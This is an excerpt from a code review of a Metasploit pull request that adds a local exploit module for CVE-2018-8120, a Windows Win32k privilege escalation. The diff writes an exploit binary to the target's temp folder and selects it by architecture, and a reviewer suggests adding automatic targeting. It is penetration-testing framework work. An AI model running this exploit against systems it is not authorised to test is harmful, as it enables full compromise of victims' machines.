modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

```diff
@@ -0,0 +1,121 @@
+
+
+  def initialize(info={})
+    super(update_info(info,
+    'Name'            => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
+    'Description'     => %q{
+      This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
+      when the Win32k component fails to properly handle objects in memory. An attacker who
+      successfully exploited this vulnerability could run arbitrary code in kernel mode. An
+      attacker could then install programs; view, change, or delete data; or create new
+      accounts with full user rights.
+
+      This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          => [
+        'unamer', # Exploit PoC
+        'bigric3', # Analysis and exploit
+        'Anton Cherepanov', # Vulnerability discovery
+        'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit module
+      ],
+    'Platform'        => 'win',
+    'SessionTypes'    => [ 'meterpreter' ],
+    'DefaultOptions'  => {
+        'EXITFUNC'    => 'thread'
+      },
+    'Targets'         => [
+        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+      ],
+    'Payload'         => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+    'References'      => [
+        ['BID', '104034'],
+        ['CVE', '2018-8120'],
+        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+      ],
+    'DisclosureDate'  => 'May 9 2018',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['OS'] =~ /XP|NT/i
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def write_file_to_target(fname, data)
+    tempdir = session.sys.config.getenv('TEMP')
+    file_loc = "#{tempdir}\\#{fname}"
+    vprint_warning("Attempting to write #{fname} to #{tempdir}")
+    write_file(file_loc, data)
+    vprint_good("#{fname} written")
+    file_loc
+    rescue
+      fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
+  end
+
+  def check_arch
+    sys_arch = sysinfo['Architecture']
+    if sys_arch == ARCH_X86
+      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+      return 'CVE-2018-8120x86.exe'
+
+    elsif sys_arch == ARCH_X64
+      return 'CVE-2018-8120x64.exe'
+    else
+      fail_with(Failure::BadConfig, "Invalid architecture")
+    end
+  end
+
+  def exploit
+    validate_target
+    cve_fname = check_arch
```

Comment:
As you're detecting the architecture, you could probably implement automatic targeting too.

Here's an example module which implements auto targeting:

* https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local/ms16_075_reflection.rb

Something like:

```ruby
      'Targets'        =>
        [
          ['Automatic', {}],
          [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
          [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
        ],

# ...

  def assign_target
    return target unless target.name == 'Automatic'

    case sysinfo["Architecture"]
    when 'x86'
      vprint_status("Found we are on an x86 target")
      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
      return targets[1]
    when 'x64'
      vprint_status("Found we are on an x64 target")
      return targets[2]
    end
  end

  def exploit
    # ...

    my_target = assign_target

    if my_target =~ /x64/
      # use the x64 executable
    else
      # use the x86 executable
    end

```